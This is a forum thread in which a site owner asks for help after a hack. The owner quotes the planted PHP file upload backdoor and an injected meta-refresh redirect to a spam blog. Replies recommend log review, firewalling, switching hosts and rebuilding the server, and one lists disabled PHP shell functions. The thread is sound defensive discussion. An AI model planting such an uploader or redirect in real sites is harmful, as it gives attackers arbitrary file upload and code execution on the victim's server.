Jump to content

My Site Being Hacked Nothing To Do With IPB - Just need recommendation Please

media

By media
in Classic self-hosted technical help

Recommended Posts

media Mentor

media

Posted
Posted

My Site Being Hacked Nothing To Do With IPB - Just need recommendation Please

Somehow, hacker is uploading a upload file either calls it sources.php or up.php or something else 

Anyway, the content of the file is this

 <?php
 echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
 echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
 if( $_POST['_upl'] == "Upload" ) {
 if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
 else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
 }
 ?> 

 Add this redirects to the scripts

http://free1ww1.blogspot.com/

 adds this line to scripts...

 <meta content="0;URL=http://free1ww1.blogspot.com/" http-equiv="refresh" />

and I found these info on the internet:

http://www.simplyraydeen.com/general-technical/372-hacked-godaddy-or-joomla-component?catid=31%3Ageneral

http://www.jonnypayne.com/index.php/computer/when-they-hacked-my-website/

http://0xa.li/some-interesting-malicious-php-files/

http://www.webhostingtalk.com/showthread.php?t=1105350

ANYONE KNOWS WHAT TO PATCH OR DO ABOUT THIS

THANK YOU FOR YOUR HELP....

P.S. I SCANED THE SERVER NO MORE FILE

and changed the password e.t.c.

Link to comment
Share on other sites
Birched Apprentice

Birched

Posted
Posted

Have you searched your access logs for these filenames (e.g. up.php, sources.php) to see where they are coming from? As a first line of defense, and to give yourself a little breathing room, it might make sense to block the IP addresses (or range) where these files are originating in your firewall.

Keep a record of the filenames, the dates and times they were created, any changes you see, etc, and search your logs for clues using this time and date and filename information to narrow things down. That may give you a clue as to how they are getting in.

That's somewhere to start, anyway. Perhaps someone with more expertise will chime in with other ideas. I don't know whether there is a 'harden your IPB board' guide here.

Link to comment
Share on other sites
media Mentor

media

Posted
  • Author
Posted

What did you use to scan your server?

These things normally get uploaded when there are vulnerabilities in scripts on your server.

You say that this is nothing to do with IPB, have you made sure that any other scripts that you use are fully patched?

Well, I have no idea, I am looking at access log but I do not know what to look for... :)

Link to comment
Share on other sites
media Mentor

media

Posted
  • Author
Posted

Firstly, alert your hosts.

Are you on a shared server or VPS?

Read the comments section in below Topic.

'?do=embed' frameborder='0' data-embedContent>>

I guess my host little rookie... They are asking me to lead them lol!

Well here what they did so far:

They did a deep scan for root kit or any other malicious file: result:

root kit: NONE

they found couple upload php files (first post has the code in those files)...

They removed those...

and they decided to install mod secure

also according to my host: They tighten the server php by disabling/blockin this functions in php: (not sure what that means, I believe show_source already blocked before)

disable_functions="exec,passthru,shell_exec,system,proc_open,curl_multi_exec,show_source"

Also they thinking about adding CSF firewall,

So, so far that's all I have... please let me know if you think any other suggestion....

Thanks

Link to comment
Share on other sites
IveLeft... Rising Star

IveLeft...

Posted
Posted

I guess my host little rookie... They are asking me to lead them lol!

Well here what they did so far:

They did a deep scan for root kit or any other malicious file: result:

root kit: NONE

they found couple upload php files (first post has the code in those files)...

They removed those...

and they decided to install mod secure

also according to my host: They tighten the server php by disabling/blockin this functions in php: (not sure what that means, I believe show_source already blocked before)

disable_functions="exec,passthru,shell_exec,system,proc_open,curl_multi_exec,show_source"

Also they thinking about adding CSF firewall,

So, so far that's all I have... please let me know if you think any other suggestion....

Thanks

:ohmy:

I'd suggest a better Host !

Link to comment
Share on other sites
Grumpy Apprentice

Grumpy

Posted
Posted

The ONLY sure way of being safe after being hacked is to nuke it. Sorry.

Long read, but you'll want to read this.

http://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server

.

By the looks of the file that was added, it appears to be an upload script that doesn't check for security. So, it basically allows ambiguous files to be uploaded and likely then execute through something like apache if they uploaded a php file. It'll be hard to tell what were added.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
Invision Community © 2024 IPS, Inc.
×
×
  • Create New...